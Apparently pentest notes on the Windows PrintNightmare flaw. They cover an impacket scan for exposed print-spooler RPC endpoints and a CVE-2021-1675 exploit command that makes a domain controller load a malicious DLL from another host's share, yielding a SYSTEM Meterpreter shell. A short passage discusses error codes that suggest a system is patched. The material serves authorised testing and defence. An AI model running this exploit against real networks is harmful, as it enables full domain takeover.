PrintNightmare

Scanner

python3 /usr/share/doc/python3-impacket/examples/rpcdump.py @10.20.11.x | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

A scanner has been also incorporated to PingCastle which is a tool that can benchmark the security posture of an active directory. The “spooler” from the scanner menu can scan all hosts on the domain, only servers, only workstation or only the domain controllers.

Massive scanner:

Exploit

The Impacket implementation of PrintNightmare was developed by Cube0x0 and could be found in the CVE-2021-1675 GitHub repository. The current version of Impacket produce errors while attempting to exploit the PrintNightmare vulnerability through the python script. Therefore it is recommended to use the version which is included in the repository. The script requires domain user credentials, the IP address of the domain controller and the UNC path which the DLL is hosted.

python3 ./CVE-2021-1675.py purple.lab/pentest:Password123@10.0.0.1 '\\10.0.0.7\smb\pentestlab.dll'

The python script will attempt to bind to the Print Service and identify the driver path. Then will execute the malicious driver from the UNC path. The “multi/handler” Metasploit module was used in order to capture the connection. Looking at the Meterpreter session SYSTEM level privileges have been obtained on the domain controller. This is because the malicious driver was executed under the context of the Print Spooler service and not from the perspective of the user.

Maybe fixed | Error

0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver (see, e.g., the functionality of https://github.com/ly4k/PrintNightmare).

In this case, the error is returned for RpcEnumPrinterDrivers. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.

#59 seems to reference the same issue, so I am cross-referencing it here in case others are looking for an answer.

Sources

https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

Last updated